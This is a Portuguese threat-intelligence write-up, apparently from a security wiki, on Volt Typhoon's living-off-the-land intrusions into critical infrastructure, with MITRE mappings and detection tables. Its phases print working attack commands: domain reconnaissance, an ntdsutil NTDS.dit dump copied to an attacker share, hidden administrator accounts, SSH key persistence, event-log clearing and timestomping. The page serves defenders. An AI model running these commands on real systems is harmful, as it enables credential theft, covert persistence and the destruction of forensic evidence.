# PROC - Volt Typhoon: Living-Off-The-Land em Infraestrutura Critica ## Visão Geral O [[g1017-volt-typhoon|Volt Typhoon]] (também denominado BRONZE SILHOUETTE, Vanguard Panda) e um grupo APT vinculado ao estado chines, operando com um mandato explicito de pre-posicionamento em infraestrutura critica ocidental. Diferente de APTs focados em espionagem imediata, o Volt Typhoon opera com horizonte temporal de longo prazo: o objetivo e estabelecer acesso persistente e silencioso que possa ser ativado em momentos de escalada geopolitica para perturbar comúnicacoes militares, energia e agua em caso de conflito no Pacifico. A caracteristica mais distintiva do grupo e o uso quase exclusivo de **Living-off-the-Land (LotL)**: o Volt Typhoon evita implantar malware customizado, utilizando apenas binarios, ferramentas e protocolos nativos do sistema operacional e da rede alvo. Essa escolha torna a detecao extraordinariamente dificil - cada acao individual parece legitima quando analisada isoladamente. O grupo usa `netsh`, `wmic`, `ntdsutil`, `certutil` e comandos de shell para toda a sua operação, sem binarios externos. O grupo foi exposto públicamente em um advisory conjunto NSA/CISA/FBI em maio de 2023, revelando que havia comprometido redes de infraestrutura critica nos EUA, Guam (base militar), e aliados. A descoberta causou alarme significativo por evidênciar acesso persistente de anos em setores como energia eletrica, agua, telecomúnicacoes e transporte. ## Attack Flow ```mermaid graph TB A["🌐 Exploração de Edge Devices<br/>Fortinet/SOHO Routers/VPN"] --> B["🔑 Roubo de Credenciais<br/>NTDS.dit via ntdsutil"] B --> C["🕵️ Reconhecimento LotL<br/>netsh / wmic / ipconfig"] C --> D["🔀 Pivoting via SOHO Routers<br/>Botnets de roteadores comprometidos"] D --> E["🏠 Persistência Legitima<br/>Contas locais + SSH keys"] E --> F["📡 Acesso Longo Prazo<br/>Pre-posicionamento silencioso"] F --> G["🔇 Cobertura de Rastros<br/>Delecao de logs + timestamps"] ``` ## Passo a Passo ### Fase 1 - Acesso via Dispositivos de Borda Vulneraveis O Volt Typhoon inicia comprometimentos via dispositivos de borda de rede: roteadores SOHO (small office/home office), appliances VPN e firewalls de pequenos fornecedores ([[t1190-exploit-public-facing-application|T1190]]). CVEs historicamente explorados pelo grupo incluem: - CVE-2022-42475 (Fortinet FortiOS - heap overflow pre-auth) - CVE-2023-27997 (Fortinet FortiGaté SSL-VPN) - CVE-2021-40539 (ManageEngine ADSelfService Plus) - Dispositivos SOHO Cisco, Netgear, ASUS com firmware desatualizado Após comprometer o dispositivo de borda, o grupo estabelece acesso ao segmento interno da rede sem implantar qualquer ferramenta adicional no endpoint - apenas roteia trafego através do dispositivo comprometido. ### Fase 2 - Reconhecimento Usando Apenas Ferramentas Nativas Todo o reconhecimento e realizado exclusivamente com ferramentas built-in do Windows e Linux ([[t1036-masquerading|T1036]]): ```batch REM Mapeamento de rede com ferramentas nativas netsh interface show interface ipconfig /all route print arp -a REM Enumeracao de hosts ativos for /L %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i REM Descoberta de servicos expostos netstat -ano tasklist /v REM Informacoes do dominio AD nltest /domain_trusts net group "Domain Admins" /domain net user /domain ``` A ausência de ferramentas externas como nmap, BloodHound ou similares e intencional: cada comando executado tem equivalente em logs de auditoria Windows com aparencia completamente legitima. ### Fase 3 - Extração de Credenciais via ntdsutil Para obtencao de credenciais de dominio, o Volt Typhoon usa o `ntdsutil.exe` - ferramenta oficial da Microsoft para manutenção do Active Directory ([[t1003-003-ntds\|T1003.003]]): ```batch REM Criar snapshot do NTDS.dit sem alertar EDR ntdsutil "ac i ntds" "ifm" "creaté full C:\Temp\ntds_backup" q q REM Copiar arquivos necessários para extrair hashes copy C:\Temp\ntds_backup\Active Directory\ntds.dit \\atacante\share copy C:\Windows\System32\config\SYSTEM \\atacante\share ``` Esse comando e identico ao usado por administradores para backup do AD - sem context adicional, e indistinguivel de operação legitima. O grupo processa os hashes offline, em infraestrutura propria. ### Fase 4 - Persistência via Contas Legitimas Em vez de criar malware ou backdoors que possam ser detectados, o Volt Typhoon cria ou ativa contas de servico legitimas com senhas controladas pelo grupo ([[t1078-valid-accounts|T1078]]): ```batch REM Criar conta local discreta net user SvcBackupAgent [senha_complexa] /add net localgroup Administrators SvcBackupAgent /add REM Habilitar conta de administrador built-in (frequentemente desativada) net user Administrator [nova_senha] /active:yes REM Adicionar chave SSH para acesso em servidores Linux echo "[chave_publica_RSA]" >> /home/svcadmin/.ssh/authorized_keys ``` A persistência via contas legitimas e superior a backdoors: sobrevive a reformatacoes parciais, reinicializacoes e até a reinstalacao do sistema operacional se a conta for no AD. ### Fase 5 - Pivoting via Botnet de Roteadores SOHO O aspecto mais sofisticado do Volt Typhoon e o uso de uma rede de roteadores SOHO comprometidos como infraestrutura de proxy ([[t1090-003-multi-hop-proxy|T1090.003]]). O trafego do grupo passa por 3-5 roteadores comprometidos antes de atingir o alvo, com IPs de origem em ISPs residenciais nos proprios paises alvo: ``` Volt Typhoon China → Roteador SOHO EUA (comprometido) → Roteador SOHO Australia (comprometido) → Roteador SOHO Canada (comprometido) → Alvo: Infraestrutura Critica EUA ``` Isso torna a atribuicao extremamente dificil: os logs mostram conexoes de IPs residenciais locais, não de infraestrutura chinesa. ### Fase 6 - Cobertura de Rastros Após cada sessao, o grupo remove evidências usando ferramentas nativas ([[t1070-indicator-removal|T1070]]): ```batch REM Limpar logs de eventos Windows wevtutil cl System wevtutil cl Security wevtutil cl Application REM Remover historico de comandos PowerShell Remove-Item (Get-PSReadlineOption).HistorySavePath REM Alterar timestamps de arquivos (timestomping) powershell (Get-Item arquivo.txt).LastWriteTime = '2022-01-01 00:00:00' ``` ## TTPs Mapeados | Fase | Técnica MITRE | Descrição | |------|--------------|-----------| | Acesso Inicial | [[t1190-exploit-public-facing-application\|T1190]] | Exploração de edge devices VPN/Firewall | | Acesso Inicial | [[t1078-valid-accounts\|T1078]] | Credenciais de contas legitimas | | Execução | [[t1059-003-windows-command-shell\|T1059.003]] | CMD/PowerShell nativos para toda operação | | Persistência | [[t1078-003-local-accounts\|T1078.003]] | Criação de contas locais legitimas | | Evasão | [[t1036-masquerading\|T1036]] | Atividade identica a operações legitimas de TI | | Evasão | [[t1070-indicator-removal\|T1070]] | Delecao sistematica de logs de eventos | | Evasão | [[t1070-006-timestomp\|T1070.006]] | Alteração de timestamps de arquivos | | Descoberta | [[t1018-remote-system-discovery\|T1018]] | Enumeracao de rede com ferramentas nativas | | Credenciais | [[t1003-003-ntds\|T1003.003]] | Dump de NTDS.dit via ntdsutil | | Pivoting | [[t1090-003-multi-hop-proxy\|T1090.003]] | Cadeia de roteadores SOHO comprometidos | | Persistência | [[t1098-004-ssh-authorized-keys\|T1098.004]] | SSH authorized_keys em servidores Linux | ## Detecção O Volt Typhoon e excepcionalmente dificil de detectar por design. Detecção eficaz requer correlação de eventos, não detecção de eventos individuais. **Abordagem recomendada - detecção por comportamento anômalo:** | Indicador Correlacionado | Severidade | Técnica | |--------------------------|-----------|---------| | `ntdsutil` executado em horario nao-comercial | Alta | EDR + SIEM time-based | | `wevtutil cl` executado após comandos de reconhecimento | Critica | SIEM correlação sequencial | | Conta de servico com login interativo (nao-esperado) | Alta | AD audit log (Event 4624 tipo 2) | | Multiplos `netsh`/`arp -a` em sequencia em servidor | Media | EDR baseline + anomalia | | Conexão SSH de IP residencial para servidor critico | Alta | Firewall + geo-anomalia | | Volume de dados transferido via conta admin incomum | Alta | DLP / NDR | **Linha de base critica:** Documentar todos os usos legitimos de `ntdsutil`, `wevtutil`, contas de servico e acessos SSH. Qualquer desvio e um sinal. ## Contexto Brasil/LATAM Embora o mandato primario do Volt Typhoon sejá pre-posicionamento em infraestrutura critica ocidental ligada a segurança nacional dos EUA (bases militares, comúnicacoes militares, energia), a métodologia LotL do grupo representa uma tendencia crescente entre APTs estatais que afeta diretamente o Brasil. O Brasil opera infraestrutura critica com niveis de proteção variaveis: o setor eletrico (ANEEL/ONS) tem protocolos de segurança mais maduros, mas municipios menores e concessionarias regionais frequentemente operam com infraestrutura legada e sem monitoramento adequado. Roteadores SOHO de fabricantes como TP-Link e D-Link - presentes em massa em PMEs e orgaos públicos brasileiros - sao particularmente vulneraveis e foram identificados em botnets LOTL. A métodologia do Volt Typhoon serve como modelo para outros grupos APTs estatais que operam na América Latina (iranianoes, russos, norte-coreanos) e que adotaram progressivamente técnicas LOTL para evasão. Organizacoes brasileiras de infraestrutura critica devem implementar monitoramento de comportamento de contas privilegiadas e auditoria de uso de ferramentas nativas como controles prioritarios. ## Referências - [CISA/NSA/FBI Advisory — Volt Typhoon LOTL Techniques 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a) - [Microsoft MSTIC — Volt Typhoon targets US critical infrastructure](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) - [Secureworks — BRONZE SILHOUETTE Profile](https://www.secureworks.com/research/bronze-silhouette) - [FBI Director Wray Congressional Testimony on Volt Typhoon](https://www.fbi.gov/news/testimony/worldwide-threats-to-the-homeland-2024) - [CISA — Secure by Design: Mitigating LOTL Threats](https://www.cisa.gov/resources-tools/resources/secure-by-design)